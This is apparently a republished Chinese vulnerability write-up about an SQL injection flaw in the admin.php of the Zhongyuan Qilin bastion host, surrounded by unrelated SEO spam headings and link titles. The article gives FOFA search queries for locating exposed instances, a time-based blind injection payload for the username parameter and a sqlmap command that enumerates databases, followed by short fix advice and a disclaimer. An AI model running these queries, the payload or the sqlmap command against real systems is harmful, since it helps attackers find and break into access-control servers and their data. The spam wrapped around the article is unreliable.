当前位置: 首页 > news >正文

网络教育网站建设临沂哪里有做网站的

网络教育网站建设,临沂哪里有做网站的,金湖网站制作,可以自己做网站卖东西简介 中远麒麟堡垒机用于运维管理的认证、授权、审计等监控管理,在该产品admin.php处存在SQL 注入漏洞。 漏洞复现 FOFA语法: body"url\"admin.php?controlleradmin_index&actionget_user_login_fristauth&username" 或者 c…

简介

中远麒麟堡垒机用于运维管理的认证、授权、审计等监控管理,在该产品admin.php处存在SQL 注入漏洞。

漏洞复现

FOFA语法:

body="url=\"admin.php?controller=admin_index&action=get_user_login_fristauth&username="

或者

cert.subject="Baolei"

访问界面如下所示:

POC:  /admin.php?controller=admin_commonuser

GET请求如下:

payload:   

username=admin' AND (SELECT 12 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm

POST请求后页面返回时间延长5秒证明漏洞存在

SQLMAP命令:

sqlmap.py -u "https://ip:port/admin.php?controller=admin_commonuser" --data "username=admin" --level=3 --dbs --is-dba

修复建议

安装更新厂商发布的新版本

添加访问控制

过滤威胁参数

免责声明

该文章仅供学习用途使用,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

http://www.yayakq.cn/news/921474/

相关文章:

  • 重庆网站建设夹夹虫负责网站建设人员要求
  • 山东平台网站建设制作线下教育机构
  • 2008建立的php网站慢校园风险管理网站建设方案
  • 怎么样做美术招生信息网站首航原创网
  • 带dede后台的整套网站源码 数据库连接不上义乌网站建设优化推广
  • 17做网站广州新塘这样自己做网站
  • 电子网站建设方案成都网站建设外包业务
  • 流程网站设计建筑网站水泡网
  • 建设部网站查询公司网站推广的渠道
  • 济南做网站互联网公司排名python在线运行
  • 领卷网站怎么做张家口购物网站开发设计
  • 品牌自适应网站建设广东佛山网络科技有限公司
  • 模具外贸营销网站如何做郑州做营销型网站公司
  • 公司网站设计专业的建设银行信用卡网站是多少
  • 青岛建设厅官方网站asp源代码网站
  • 安阳市住房和城乡建设厅网站店铺设计理念怎么写
  • 海淀做网站的公司网站怎么做文件上传
  • 哪些网站可以做养殖的广告西瓜编程网站怎么做
  • 如何让google收录网站开源购物系统
  • 阿勒泰建设招聘网站大型门户网站建设服务
  • 高端网站定制建站小程序代运营
  • 做互联网营销一般上什么网站网站正在建设中视频
  • 哈尔滨站建筑面积南京网站制作哪家好
  • 建设银行网站打不井wordpress标题属性
  • 德宏做网站大学网站建设招标
  • 看网站时的关键词网站策划方案案例
  • 正在备案怎么建网站河北建设工程信息网更名
  • wordpress站点相关中国建设工程信息网官方网站
  • 网站建设的开发的主要方法长安网站建设软件
  • 企业网站建设中企动力帝国cms 做网站地图